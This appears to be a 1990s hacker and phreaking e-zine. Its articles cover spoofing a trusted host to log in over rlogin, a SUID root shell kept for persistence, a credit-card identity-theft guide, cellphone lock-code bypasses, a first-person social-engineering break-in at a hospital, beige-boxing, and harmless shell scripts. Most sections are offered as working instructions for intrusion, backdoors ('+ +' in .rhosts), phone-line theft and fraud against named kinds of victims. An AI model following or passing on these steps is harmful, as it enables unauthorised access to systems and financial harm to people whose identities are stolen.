lets say you have in internet account, with a local Internet service provider (ISP), AND you have an account with another server, which gives you a shell account. A shell account is basically an account on the servers UNIX operating system. They give you a home directory in which you have access to the text editors such as Joe, and Pico, and you can also work on c programs using the gcc compiler. O.K. now lets say you want to save some time, so you want to make the process of logging in to the shell account shorter, or maybe eliminate it completely. Well due to the trust that a UNIX operating system has with its users, this can be done, the process of entering a password at the login screen can be illiminated. This can be done with a file called .rhosts, which will grant or deny access based off the IP address of the person trying to logon to the shell account its self. The server that is in the .rhosts file is called the trusted server for the fact that when it sees that IP address it trusts them. It thinks that they are the person that is supposed, and allowed to be there. UNIX will trust ANYONE with the specified ip address in the .rhosts file. SYN Flooding ------------ A port on most UNIX operating systems can only handle a certain number of connections to one port at a time, this is called the "backlog". If the backlog is filled up all incoming SYN connections will be ignored. Leaving them not allowed to connect to the server until the other connecting requests are dealt with properly. But if the SYN headers are spoofed when sent to the host the host will keep on trying to successfully find the person who sent the original syn message to it, and wont let anyone connect until it is done. Here's the step of a SYN Flood 1) Person uses ip spoofer to spoof his original ip address and sends out a several SYN packet to a specified port at a host. 2) The host's port gets flooded with SYN's and try's to reply to the SYN command but cant because the person who sent the original SYN is not a real host, leaving the ports closed, so no other connections can be made into that host. YOU (Spoofed IP) --SYN-----> HOST | YOU (Spoofed IP) --SYN-----> HOST | YOU (Spoofed IP) --SYN-----> HOST | YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections YOU (Spoofed IP) --SYN-----> HOST | Will be ignored because all the YOU (Spoofed IP) --SYN-----> HOST | connections are taken YOU (Spoofed IP) --SYN-----> HOST | X (Not really real) <--ACK-- HOST| So in turn the HOST cannot find YOU (With the spoofed IP) so the port is left flooded because the host will not drop the connections until they are fur filled. After a bit the server will crash.. This is called a "Denial of service attack" For the fact that it denies anyone else service to that host you can read more about denial of service in this newsletter. Sequence Numbers? ----------------- Sequence Numbers are a prime factor in this attack, but also kinda hard to explain. I only have a general knowledge of sequence numbers, but a general knowledge is a hell of alot better then no knowledge ;) Every byte that you transfer from one computer to another on a Internet network it is assigned a sequence number. Sequence Numbers are assigned to make sure that the connection that is made doesn't become corrupt. Lets say we didn't have sequence numbers, then maybe by accident we got a repeat of a byte, that would corrupt our data right there. IN a three way handshake, the first sent SYN packet contains what is called the Initial Sequence number, that sequence number tells the host what the next sequence number is. (Confused yet) This will all come together when I explain the attack at itself, its all got to do with timing and round trip time. Round trip time is how long it takes your SYN packet to reach the host and the host to send back its ACK (acknowledgment) lets say you had to do this all by hand, you send out the SYN command, and the host sends back the ACK command, you have to calculate the exact sequence numbers timing in order to send the ACK back to the host to start the data transfer. -If the sequence number you send is a smaller number then what the server expects it will just throw that try off, because it thinks its an old packet that never reached or has failed before -If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin. -If the sequence number you send is greater then what the host expects it will hold that sequence number, because it think that it is a future bit, and it will hold it until the other bits come through first.. Trust me this may all sound stupid now when I'm explaining it, but it all does come together when I start explaining the attack, you need to be able to spoof the ACK command that goes to the host when doing the 3 way handshake Oh and each time a connection is made to the host that you are making the connection to the sequence numbers goes up 64,000. The Incicial sequence number goes up 128,000 every one second, and wraps every 9.32 hours. This counting process will be needed later on in the attack.. The Attack ---------- I really cant express enough how much you need to understand the above features before going and trying to execute this attack, just for the fact that you will not be successful in your attempt, it took me 3 good days of reading to readily understand sequence numbers, and I suggest you also read all you can on sequence numbers, do searches, read internet protocol articles just make sure you understand what you are doing before you get your hopes up to find out that you didn't calculate the Round trip time right and you end up with a smaller sequence number then originally intended. Its a bummer and a waste of time if you don't understand it. Short Explanation ----------------- 1)Choose the target 2)Find trusted host 3)SYN Flood trusted host 4)Spoof the trusted host 5)Guess the sequence numbers for the outgoing ACK 6)Make the connection 7)Leave a backdoor in the .rhosts file Finding a Target ---------------- This should be fairly easy based on the fact that if your the kind of person who has a personal vendetta with a server or you just want to try this out on. Or you can get special permission from 2 hosts that will allow you to do this as a security measure, that is probably the best way to go to avoid any sorts of criminal prosecutions. I urge you to not in any way incriminate yourself, this text is for security reasons only to inform, and protect. This attack is NOT new, I did not make up this attack, I'm only explaining it, and how to prevent it. So don't come crying to me when you get raided and you have no where else to go. Stay safe and be paranoid. Finding a targets Trusted Host ------------------------------ Once you have your target, you want to find out if it has a trusted host, since you cant go into their computer and look to see if they even have an .rhosts file you have to do the checking out yourself. If the target host does not have a trusted host, this whole text is very pointless, but from here on in, I am talking as if the target host does in fact have a trusted host. This is where you use your talent of social engineering. Finding the trusted host is hard, Ill admit that, but if your going to go this far you might as well find out about the system your going to hack, know what your doing, know the system before you go in. Here is a list of possible ways to maybe gain information about trusted hosts. showmout -e target ->SHows where the file systems are exported finger -l @target finger -l @trustedserver.com finger -l root@trustedserver.com rpcinfo -p x-terminal These are a couple of ways off the top of my head, but you can always find shit out, Basically use your head in this matter, because well, this isn't the hardest part of the attack, it may seem that way now, but it only gets harder from here on out. Talk to a representative of the company, I dunno read up on social engineering... Over all this attack all comes down to trusted hosts, which are inserted into the .rhosts file itself, this is why I spent a some time explaining .rhosts files, because if you can become the trusted host you also have access to the target host. Is this getting better by the minute or what? SYN Flood trusted host ---------------------- In order for this whole thing to go through the trusted host must be taken out with a SYN flood (SYN Flood was discussed earlier in this article) for the fact in later parts of this attack you need to spoof as the trusted host then send out a SYN command to the target host's port to try to connect to it, and if the host your attacking can send a message back to the trusted host, it would get an error saying that host did not send out a SYN packet for an opening connection, so in turn to make sure that does not happen. You must flood the ports of the trusted host so no other connections can be made. *NOTE* This is because you are flooding ports on the trusted host and when the port in the trusted host is still looking for someone to send back an ACK (It is still gagged by the SYN flood) command to it doesn't let any other connections come through. So you can successfully guess their sequence numbers that you guess (IN time) that the trusted host would send to the target host. SYN flooding software is readily available at many "Underground" sites and I wont go into posting the code here for the fact I'm just wasting space when you can do a search on the internet yourself and find it. For example a very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder. But this NEEDS to be done, you don't need any interruption's in this attack. Sample the sequence numbers --------------------------- Because you are not the real host you are mearly a spoofed version of the trusted host, you also have to spoof the return sequence number. Remember in the three hand shake there is first a SYN from you, that tells the host that you want a connection to its server, then the host sends back an ACK or acknowledgment. So if you spoof the trusted server and send out a SYN packet, the server you just sent the SYN packet to will try to reply back. If you don't guess the right sequence numbers (OR the timing of the transfer) it wont let you log in. See if the REAL trusted host was available (Not under a SYN flood) the real trusted host would have given the other host an error. But with the SYN flood gumming up the works, and not allowing any other connections, you can successfully spoof back the ACK back to the host so you can connect. Before you do the initial attack connect to one of the major ports on the server your going to attack, like port 25 (The sendmail port) and sample its sequence numbers. You need to calculate how long it takes for Your SYN reaches the server and an SYN/ACK is sent back to you, then the ACK you send back to the host, all in one. Do this many times until you have enough you feel is a good diagram to round up and become a one figure. Remember sequence numbers go up 128,000 a second, and 64,000 per connect. -If the sequence number you send is a smaller number then what the server expects it will just throw that try off, because it thinks its an old packet that never reached or has failed before -If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin. -If the sequence number you send is greater then what the host expects it will hold that sequence number, because it think that it is a future bit, and it will hold it until the other bits come through first.. Spoof the trusted host ---------------------- This is easy there are many ip spoofer software for linux and the unix flavors, just pick one of these up and compile it. *NOTE* You must have root on the linux operating system you are doing the attack from for the fact that if you just have a regular home directory you cannot open up raw connections in which are needed for a general spoof. So load it up and spoof the address of the TRUSTED host, and go right on to the next part. The heart of the attack ----------------------- This is the main part of the attack, once you are spoofed as the trusted host, you should send a connection request to port 513 (The login port) Then the host will then send back a SYN/ACK to the trusted host, which is under the gagging of the SYN Flood so it wont accept anymore connections hence it wont get an error back. While this is all going on we have to wait for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK back to the host you are attacking with your guessed Sequence number attached (Plus one because we are sending for a login) If your guess is correct it will then accept your connection. Type the magical word root and since that .rhosts file is there, and you are spoofed as the trusted host, you will get automatic access to the system. Isn't unix great? Trust is a great thing to encounter in any type of linux operating system. Once inside.. ------------- Since you really don't need to edit or destroy any log files, you are home free, but as one last thing we do, we will put in a backdoor so we can access their system as we please (No more of this spoofin shit) so we do a cat + + >> ~/.rhosts . When you add a + + (as explained earlier) its basically saying any host is allowed without entering a password. The only problem with that alot of systems now adays are equipped with a program that looks for .rhosts files that have a + + file..But oh well fuck it, your in it just for the hack of it right? Conclusion paragraph -------------------- Basically this attack is very useful if you know what you are doing. This wasn't as 'in depth' as I would have liked to go, but well, I'm not the kind of person who can splash what's all in my head onto a piece of paper, its easier for me to consume information then give it away. But I tried my best and I hope you could understand it. Id like to give a couple shoutouts to the people who made this article happen. Phrack, Modify for teaching me the art of spell check, and the whole 0 cr3w. Remember before asking a question, always try to answer it yourself first. Phe3r m3, Merde Fuk _____________________________________________________________ One method to keep root...............WaRsPrItE -----BEGIN PGP SIGNED MESSAGE----- First off, this is NOT a true hack since it requires that you have root access to begin with. I'm including it only as a way to keep root once you find it. I mean c`mon, how hard is it to write a simple script or batch job to do a "who -a | grep root" every five minutes and log the output to a file at $home/.root and tail it to an xterm window? Sooner or later root will forget to log off! I've only managed to get this to work on a few *NIX systems and Solaris 2.4.1 and higher has fixed this hole. But those assholes at Santa Cruz Operations ...... *evil grin* # cp /bin/sh $home/.root_shell # chmod 4111 $home/.root_shell These commands create a SUID root version of the Bourne shell ("stickey bit") in the home directory of the user. I personally use a file name with a "." just to keep prying eyes out. You can optionally use commands like "chmod g+s" to execute a file as the GUID of the file. Assuming of course you have access as the approiate group to begin with. Which is easy `cause people always forget to log off (especially around lunch time :) )This would be handy in case you want to look at payroll records in say the "accounting" group. Once again, security compromise via stupid end users! WaRsPrItE -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBMd/HlH5eXk/jGmY7AQHPpQf/cn2vesmlxbIOdpIiVY53FUcoJmihsEuc eTBMdCtyBibLxzVk9xak2GTtNcxppFphtLWh3v0f5aKF61NFSMsj7g1e1DcmMAn5 KTijlQc2pgB0OLhorsTA+/rSGl/TRa4uNVIYLpvCoU1H+5Y/kP8RuD1kgvgvl7Xe R0zHmfqMYnRz5U8nedH2xagvnxnRixglt+bnYZS5/4fGuE9b2oz6iKbA7hG+ya9Q rlTBvSd9uUw7nwtJgBdj7MMtlGwRhCUWP0pQBniYSbBOMfRZ22gL8is5lI2f8Tqh To0YOe6T1dPvkYzYmvafz3F6IR5pnSltONeuUaeCSI3nBWGrpiaU/A== =JVIc -----END PGP SIGNATURE----- -==-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=----=-=-=-=-=-=--= Carding..more basics for the lame... BY ArcAngl To check if a CC # is valid phone 1-800-228-1122 (need merchant # usually 5 digits) To obtain a valid credit card under someone else's name: 1. Identify a target name, such as one of your teachers, co-workers, ect... 2. Once you have a target name, you need to obtain their SSN. This can be done in many ways using social engineering. For example: call up the target's electric company, saying you are him, and that you need to make a change to you mailing information possibly. Ask them what information they have on record. Then say, also, IÆd like to verify my SSN that you have, I had a mix up a few years ago, and I want to make sure you have the correct one...what do you have? 3. Once you have the targetÆs SSN, obtain a Visa/MasterCard application. You can find these in many places: banks, magazine inserts, ect...or simply call and request one. Once you have the application, simply fill out the form with the targetÆs name. Now the hard part: for the address, you will need to have a place that you have access to the mail delivery. DO NOT USE YOUR OWN! You may try: neighbors on extended vacation, house where people just moved out, house just built, a friend that will deny any receipt of a card, ect...you get the picture. Then fill in the targetÆs SSN and the rest of the info. Then simply mail it! You may also call in the info and ask for overnight processing. Do this from a payphone, or op divert for the uberelite! 4. The new card will be sent to the address you specified. It will be a valid card, in the targetÆs name and all charges will reflect on the targetÆs credit report. It will take monthÆs for the target to realize there is a card out there in his name. You have the physical card in your possession...how many times does WalMart ask for ID when charging a new Pentium? NONE!!!! Oh yeah...watch for cameras that will id you! _____________________________________________________________ Cellular Programming Archives, Pt. I from Phrax Phrax has been kind enough to provide everyone with a large volume of information on cellular phone programming for about every phone out there. Over the next few months, THTJ will be posting cellular information from the large archive that Phrax has collected. And, as always, this information is for informative purposes only, so we know you will only use it for that, and not to phreak some phones ..... ( yea right! ). ------- AUDIOVOX BC40, 45, CMT400, 405, 410, 450, 550, 600, 605, 750, 1700, SP75 NOTES: This is a single NAM unit. The ESN prefix is 138 decimal, 8A hex (Toshiba) You MUST know the lock code to program this unit. Audiovox: 516-231-6051/213-926-7758 NAM programing: 1. With the power turned on enter N N N FUNC # 1, where NNN is the three digit lock code. The manufacturers default is 000 2. The # key increments the step number. 3. The * key decrements the step number. 4. STO enters the data for each step. 5. You MAY directly access any step by pressing RCL followed by the step number. 6. FUNC SND completes programing. 7. FUNC CLR exits programing mode. PROGRAMING DATA: STEP# #OF DIGITS/RANGE DESCRIPTION 01 3 DIGITS FIRST THREE DIGITS OF PHONE NUMBER 02 4 DIGITS LAST FOUR DIGITS OF PHONE NUMBER 03 3 DIGITS LOCK CODE 04 3 DIGITS AREA CODE 05 00001 - 32767 SYSTEM ID 06 0 OR 1 HORN ALERT 07 0 OR 1 HANDS FREE 08 0 OR 1 CONTINUOUS DTMF 09 0 OR 1 REPERTORY DIALLING 10 00 TO 15 GROUP ID (10 FOR USA) 11 00 TO 15 ACCESS OVERLOAD CLASS 12 0000 (ONLY) STATION CLASS MARK 13 0 OR 1 LOCAL USE MARK 14 0 OR 1 MIN MARK 15 0333/0334 IPCH, AUTOMATICALLY SET 16 0 OR 1 PREFERRED SYSTEM, AUTOMATICALLY SET 17 000 TO 255 SEE NOTE 1 BELOW 18 000 SET TO 000 ONLY 19 000 SET TO 000 ONLY 20 00001 - 99999 SYSTEM ID INHIBIT 21 0 TO 31 HORN ALERT TIME OUT IN HOURS (CMT 550 ONLY) 22 0 TO 31 ELEC MESSAGE RECORDER TIME OUT IN HOURS (CMT 550 ONLY). SEE ALSO NOTE 2 BELOW. 23 0 TO 255 NO CHARGE AIR TIME DELAY IN SECS (NOT ALL MODELS) 24 000 TO 999 AIR TIMER CLEAR CODE 25 000 SET TO 000 ONLY 26 CHECKSUM AUTOMATICALLY SET 27 CHECKSUM AUTOMATICALLY SET NOTES: 1. These options can be selected by adding together the following codes: 0 = No options, 1 = Preferred system lock (not on CMT 550) 2 = Auto Lock (CMT 550 only), 4 = Call timer beep CMT 550 only), 8 = Home Roam inhibit, 16 = Automatic system redial (CMT 550 only). Add together the codes of the desired options, for example to select Call timer beep and auto redial add 4 to 16 for a code of 020. 2. 1 to 31 hours, except that a setting of 0 will turn phone off after 8 hours. LOCK: F 4. UNLOCK: Enter three digit code. A/B SYSTEM SELECT: This procedure only works on models manufactured after September 19, 1987. The first two digits of the serial number indicate the month (01-12), the third digit of the serial number indicates the last digit of the year (198n). FCN 7 STO = PREFERRED SYSTEM, FCN 8 STO = HOME SYSTEM ONLY, FCN 9 STO = NON PREFERRED SYSTEM, FCN 0 SWITCHES BETWEEN A/B AND B/A, PRESS STO WHEN THE DESIRED OPTION IS DISPLAYED. ------ AUDIOVOX CTX1500, 2500, 4000, 5000, BC410, 55, SP85, TRANS 410. NOTES: These are single NAM units. The ESN prefix is 138 decimal, 8A hex (Toshiba) You MUST know the lock code to program this unit, see below for "back door" programing methods. Audiovox: 516-231-6051/213-926-7758 NAM programing: 1. With the power turned on enter N N N FUNC # 1, where NNN is the three digit lock code. The manufacturers default is 000 2. The # key increments the step number. 3. The * key decrements the step number. 4. STO enters the data for each step. 5. You MAY directly access any step by pressing RCL followed by the step number. 6. FUNC SND completes programming. 7. FUNC CLR exits programming mode. PROGRAMING DATA: STEP# #OF DIGITS/RANGE DESCRIPTION 01 10 DIGITS MIN (AREA CODE & PHONE NUMBER) 02 3 DIGITS LOCK CODE 03 00000 - 99999 SYSTEM ID 04 00 - 15 ACCESS OVERLOAD CLASS 05 00 - 15 SYSTEM ID (10 FOR USA) 06 0 OR 1 LOCAL USE MARK 07 0 OR 1 MIN MARK 08 0333 OR 0334 INITIAL PAGING CHANNEL 09 0 OR 1 PREFERRED SYSTEM 10 4 DIGITS STATION CLASS MARK 11 8 BINARY DIGITS FUNCTION 1, SEE NOTE 1 BELOW 12 8 BINARY DIGITS FUNCTION 2, SEE NOTE 2 BELOW 13 00 TO 31 HOURS POWER OFF TIMER (CTX 4000 ONLY) 14 000 TO 255 SECS NO CHARGE AIR TIMER DELAY 15 3 DIGITS CALL TIMER RESET CODE 16 - 20 00000 - 99999 SIDH INHIBIT # 1 THRU # 5 21 - 25 NOT USED FUTURE USE NOTES: 1. This is an eight digit binary field. 10000000 = CALL TIMER BEEP 01000000 = AUTO LOCK 00100000 = AUTO SYSTEM REDIAL 00010000 = CALL RESTRICTION 00001000 = 32 DIGIT DIALING CAPABILITY 11111000 = ALL OF THE ABOVE 2. As above but options are: 10000000 = HANDS FREE 01000000 = CONTINUOUS DTMF 00100000 = REPERTORY DIALING 00010000 = HORN ALERT 00001000 = ALLOWS 911 CALLING WHEN UNIT IS LOCKED 01101000 = ALL OF THE ABOVE A/B SYSTEM SELECT: FCN 0 4 DISPLAYS CURRENT MODE, FCN 0 0 = PREFERRED/NON-PREFERRED, FCN 0 1 = PREFERRED ONLY, FCN 0 2 = HOME ONLY FCN 0 3 = NON PREFERRED ONLY, "BACK DOOR" PROCEDURES: We cannot guarantee the accuracy of these procedures, USE CAUTION! SP 85 The lock code can be reset to 000 be shorting pins 6 and 17 on the handset control conector. CTX SERIES Short pins 6 an 17 on the data cable, turn power on and enter 000 FUNC # 1. TRANS 55 AND BC 55 Ground pin 1 of the six pin connector next to the modular jack on the tranceiver. Looking at the tranciever with the modular jack to the right of the six pin connector, pin one is bottom right. LOCK: Press LOCK. UNLOCK: Enter three digit code. SYSTEM SELECT: F 0 4 shows current mode. F 0 0 = Pref/Non pref, F 0 1 = Pref only, F 0 2 = Home Only, F 0 3 = Non pref only. ------ Well this is all for this month, tune in next month for more information. _____________________________________________________________ Basic Social Engineering...............WaRsPrItE -----BEGIN PGP SIGNED MESSAGE----- I hesitate to even type this up and submit it for distribution. But I want to make the point,that hacking takes RESEARCH! The easiest way to gain access to somebody's account is to just ask them for their password.Here's a perfect example. One day visiting my Mom at work I was in the IS department at my local hospital. I noticed a modem labeled "Dial Up" followed by the phone number. So just for giggles I called it and saw. <name of the hospital> Medical Manager SCO Unix release 2.3.4 login: I went to the hospital the next day and found an old WYSE60 terminal with the same login screen sitting on one of the desks. But the terminal also had a sticker on it from the vendor advertising their support line. "In case of trouble call <company name> 1-800-555-XXXX". Making a mental note of the vendor's name I glanced down at the phone and made another mental note of an inside line phone number. The next day I called the office on the inside line and the conversation went something like this. Office girl: "<name of the department> Jackie speaking.How may I help you?" Me: "Hi Jackie! This is <fake name> calling from <company name>. How are you?" Office girl: "Good. What can I do for you?" Me: "Well, we've been really busy here lately. We're upgrading the cryptographic algorithm on your primary domain controller. As well as re-compiling the user accounts database. And I thought I'd call office to office to make sure that everyone could get in OK. Could you log out and log back in for me?" Office girl: "Sure, no problem. Just a minute. Do I just enter "jjohnson" and my password like always?" Me: "Wait a second and I'll dial in and check. You said you enter "jjohnson"? And what password?" Office girl: "medical" Me: "All lower case?" Office girl: "yes" Me: "Well,<dramatic pause> it looks good on my end. Why don't you go ahead and try" Office girl: "Ok....<long pause>......Ok I'm in!" Me: "Great! Thanks, if you run into problems give me a call here at the office" The thing that struck me about her password was it was "medical" which was also apart of the title of the software package that they were using. It sounded alot like the default password that came installed when the vendor installed all the user accounts.So I promptly dialed in, logged in as "jjohnson" with a password of "medical". The bummer was that I was within a program and couldn't reach a shell prompt. No problem, I entered "!" (like hacking PINE) and bingo, a "$" appeared. After that,I did a cat of /etc/passwd to get a listing of all the logins. Notice I didn't do "shadow" all I would've got is an "access denied" and a possible entry on the admin's log. After that i logged off and checked all the other logins to see if they were also using the defaut password of "medical". Sure enough,7 were!! It is important to try this in case "Jackie" gets paranoid and calls the support line and has her password changed. Then you're back to square one. The moral of this story is, I managed to compromise the security of a major hospital just by being friendly and confusing the office help. No k-rAd 3l33t3 haX here, just stupid end users :) ! WaRsPrItE -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBMd/IkH5eXk/jGmY7AQGR0Af/UTrFWHAjsWIsCBXha+LSAqtJ68548Khw 9ye7ug1HAVU9Mu5JmbmwoKcIoavfNeLPB/35zMAnCPmpFf92US8bCSAe1MbRrmQL uzwqDjuo0SX/hco+HSqhd6fnajoGp9rqxEpq3QdwQ+/b9I8YTEraw30Yq+yA/Rsg jtOmnAKvTlb/jSsvg8wmX0xqfTJZANIOvDFXa2+sVGwuY5uh9symfMKmUXzrpNQC EZUtKMJnqVzpwIhZJPLAawgnFDbAu8mT8UZ/BQVJ/GeyaVwiDe8VzkuiACDY418f kRFWDNSObbadWVuLoGxo9Ag6hfhquuptrRx8SJm19OgeUzam1dXX0Q== =f/5Y -----END PGP SIGNATURE----- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- DTMF Decoding - By ArcAngl Ok, I have had the shits of having newbies beg for info on HOW TO DECODE DTMFs!! So here it is.... 2 ways of many! software: WWW.Cyberramp.net/~shima/index.html It will only decode 4 digits at a time with the shareware version, but if you're clever, you record the wav file then edit it into pieces to decode whole #'s. ...or If you're clever, you will record the number, then dial your own pager # and play it back into the phone, and press the pound sign when done. The pager will show the # in a minute. ;- _____________________________________________________________ ------------- --=[Redneck Phreaking]=-- By Shoelace ------------- Hola! Shoelace here, writing a small, lame entry to inform people near me, and in other places down South, about how easy it really is to get even the simplest phreaking in. Contrary to popular belief, there are phreaks in Tennessee. In my town, we have only 5 that I know of. The most noted of course, is dr1x/kz. I think only three of us have modified our Tone Dialers to make them into Red Boxes, with the help of Acid_novA. But, the most simplest of all phreaking here, or at least in East Tennessee, is Beige Boxing. You don't even need aligator clips, or really anything else in the help files about Beige Boxing that you have probably read. All you need is a screwdriver, and a regular phone. You see, behind all the houses are these grayish colored boxes of varies sizes. They usually say "Telephone Network Interface" on them. They are attached by screws. Unscrew it, and open it up. You will see one, maybe two (if they have two lines), holes with phone jacks in them. Take out that jack, and put in your phone. You should have dialtone. Ta da! That is how easy it is to Beige Box down South. I don't know what other states have their boxes like this, but if you do, don't delay! Go out and Beige Box! -Shoelace -http://www.public.usit.net/sltaylor ------- --=[The End]=-- ------- _____________________________________________________________ Basic UNIX Scripting...................WaRsPrItE -----BEGIN PGP SIGNED MESSAGE----- Here's some basic UNIX scripts that I found useful for searching a system for log files, grep'ing for possible entries, and traversing directory trees.These were written for SCO UNIX. # .kshrc -- Commands executed by each Korn shell at startup # Copyright (c) 1990, The WaRsPrItE Corporation Inc. =] # All rights reserved. # If there is no VISUAL or EDITOR to deduce the desired edit # mode from, assume vi(C)-style command line editting. if [ -z "$VISUAL" -a -z "$EDITOR" ]; then set -o vi fi TMOUT=300 info() { echo "\nDate `date '+%m/%d/%y %H:%M'`\n" echo "logname `logname`" echo "Parent PID $PPID" echo "Old pwd $OLDPWD" echo "On `expr $SECONDS / 60` minutes" echo "Path $PATH" echo "cd path $CDPATH" echo "Home $HOME" echo "Time out $TMOUT" echo "Current Jobs `jobs`" echo "Spooler `lpstat`" } #----------------------------------------------------------------- # Change Directory # Changes directory and sets the new PS1 variable #----------------------------------------------------------------- ccd() { if [ $1 ] then cd $1 PS1="!_`logname`_`pwd`> " fi } #----------------------------------------------------------------- # List DIRectories #----------------------------------------------------------------- ldir() { l -F $1 | grep / | more } #----------------------------------------------------------------- # File Find # Recursively looks for a file from the working directory #----------------------------------------------------------------- ffind() { if [ $# = 1 ] then find . -name $1 -print else echo "Usage: ffind <filename>" fi } #----------------------------------------------------------------- # Recursive Grep # Search's all files below working for search string #----------------------------------------------------------------- rgrep() { if [ $# = 1 ] then echo "Searching: $1" find . -local -exec grep -il $1 {} \; else echo "rgrep: Invalid number of arguments" fi } #----------------------------------------------------------------- # Recursive Chmod #----------------------------------------------------------------- rchmod() { if [ $# = 1 ] then find . -local -exec chmod $1 {} \; else echo "Usage: rchmod <mode>" fi } #----------------------------------------------------------------- # Recursive Chown #----------------------------------------------------------------- rchown() { if [ $# = 1 ] then find . -local -exec chown $1 {} \; else echo "Usage: rchown <owner>" fi } #----------------------------------------------------------------- # Recursive Chgrp #----------------------------------------------------------------- rchgrp() { if [ $# = 1 ] then find . -local -exec chgrp $1 {} \; else echo "Usage: rchgrp <group>" fi } alias cd="ccd" alias home="cd $HOME ; clear ; m" alias .l="history" alias .x="fc -e -" alias .e="fc -e vi " #----------------------------------------------------------------- # Total the size of the file in current directory #----------------------------------------------------------------- total() { clear l $1 | awk ' { if ( $1 != "total" ) { counter = counter + $5 printf("%10s %s %s\n",counter, $0, system("file ",$1) }} ' | more } #----------------------------------------------------------------- # Easy Change Directory # # I found this in a sys admin forum and modified it. Changed the # home of the ecd files to /tmp to save room on the system. If # you want everyone to have their own list just change the /tmp's # to $HOME. Sorry the modules are not very well documented, it was # late and I concentrated more on the code. # # Scott #----------------------------------------------------------------- ecd() { if [ $FCD ] then echo "sorry.." return else FCD="Fcd" export FCD fi echo echo "Loading ecd: type \"ecd\" for information" #----------------------------------------------------------------- # add a directory to the list #----------------------------------------------------------------- addline() { error=0 echo "Enter full path of $Newline: \c" read Fullpath if [ -d $Fullpath ] then echo $Fullpath >> /tmp/ecd.list else echo "Sorry, can't find that directory!" error=1 fi } #----------------------------------------------------------------- # usage #----------------------------------------------------------------- function usage { echo "\n" echo "Easy Change Directory:" echo echo "Usage: ecd directory-name" echo " ecd -e directory for extended search." echo " ecd -p to add current direcory to list." echo " ecd -r to recursively scan directories under current." echo "\n" } #----------------------------------------------------------------- # main Loop #----------------------------------------------------------------- function ecd { error=0 FileDir=/tmp/ecd.list Duplist=/tmp/ecd.dup if [ $# = 0 ] then usage return 0 fi Extend="NO" #----------------------------------------------------------------- # Check for right parameters #----------------------------------------------------------------- case $1 in "-e") if [ $# != 2 ] then echo "Error: insufficient parameters ($#)" echo "Usage: ecd -e directory" fi Extend="YES" shift ;; "/") ccd / return 0 ;; "-p") CurDir=$(pwd) grep "$CurDir\$" $FileDir > /dev/nul if [ $? != 0 ] then echo $CurDir >> $FileDir return 0 else echo "Current directory $CurDir\n is already in $FileDir" return 1 fi ;; "-r") echo "Scanning direcotories under $PWD" find $PWD -type d -print >> $FileDir cat "$FileDir" | sort | uniq > $Duplist if [ $? = 0 ] then echo "Sorted and cleaned up $FileDir" echo mv $Duplist $FileDir fi return 0 ;; esac #----------------------------------------------------------------- # Does a list exist? if not make one #----------------------------------------------------------------- if [ ! -f $FileDir ] then echo "Creating new $FileDir in /tmp. It may take a while..." find /tmp -type d -print > $FileDir fi #----------------------------------------------------------------- # Check the list #----------------------------------------------------------------- if [ $Extend = "YES" ] then grep $1 $FileDir > $Duplist else grep $1'$' $FileDir > $Duplist fi #----------------------------------------------------------------- # Number the lines #----------------------------------------------------------------- lines=`wc -l $Duplist | awk '{print $1}'` #----------------------------------------------------------------- # Does the directory exist? #----------------------------------------------------------------- case $lines in 0) echo "Not found: add(y/n)?\c" read ans if [ $ans = 'y' ] then Newline=$1 addline $Newline if [ $error = 1 ] then return 1 fi else return 1 fi ;; 1) Flist=`cat $Duplist` ;; *) echo awk '{ printf "%2d : %s\n", NR, $0 }' $Duplist echo "-----------------------------------------------------------------------" echo -n "(Enter directory number or 'q' for none)? \c" read lineno if [ $lineno = 'q' ] then echo "Removing possible duplications from file list..." cat "$FileDir" | sort | uniq > $Duplist if [ $? = 0 ] then echo "Sorted and cleaned $FileDir" mv $Duplist $FileDir fi return 1 fi while [ $lineno -gt $lines -o $lineno -lt 1 -o $lineno = 'q' ] do echo -n "Valid input: 1-$lines or q. Re-enter number: \c" read lineno done if [ $lineno = 'q' ] then return 1 fi Flist=`sed -n "${lineno}p" $Duplist` ;; esac echo "Changing directory to: $Flist" echo "\n" ccd $Flist 2> /dev/null if [ $? != 0 ] then echo "Removing defunct $Flist from $FileDir" cat $FileDir | grep -v $Flist > $Duplist if [ $? = 0 ] then mv $Duplist $FileDir else echo "An error occured while editing $FileDir. It may be damaged" fi fi } ecd $1 } WaRsPrItE -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBMd/KnH5eXk/jGmY7AQFWAwf+IXUFbYOnZWXrg0DfJj49Yv/tJ3V1Jfz8 fQ2BUUJhUxSEEe2RjQbr0D8gnQkG/EGOLAP4MvkKQVqyRHhFF+AsO3QEtIH1WGDI x6Z/aAQv0ALWE/qUQR0lgPToVClECz/mdEKi4Z92UUYPmrrYO8Uv3DKhmDwWvNTE hSXKWNsrBhS/eJhQqF3ptk7EoWL2C4fgLchTjy7faHY+w7WGocHQf3SvPJCDdi7n tQoLzxsBL0skBhuzGIeQvInBPHrRRIT1hAq0Q4Si5tp7PxAds7YFXWPzCel1HccE VpOUJaQ/H8QlUxDqzoF/jeWIuqES9qxNauCET+VUA4uX3J3RlC0ycg== =vVWe -----END PGP SIGNATURE----- _____________________________________________________________ KEEPING UP WITH THE TELCOS--- by ArcAngl Employee News & Information Lines: --------------------------------- The phone company has a phone number that their employees can call up and find out what's new with the company, how the company's stock is doing, what new advances in phones have been discovered and how they're catching people like us. To get a newsline number, call the phone company's main office and ask them for it. Sometimes they won't know what you're talking about but keep pestering them until they give it to you. Below is a small list of newslines. Bell Atlantic....................(800)-647-NEWS Ameritech.......................(800)-893-LINE (312)-917-9797 Main Numbers & Employee Locators: -------------------------------- An employee locator is a service for Bell employees that helps you find out exactly what department any employee of Bell works for. Sometimes automated, you enter in the name of the employee on your touch tone phone and the computer will rattle off their work phone number, street address and state. Most locators have a live operator who you just ask for the information. Usually the employee locator is the same number as the main number. To get this number, call up directory asisstance and ask them for the phone company's main number. Call 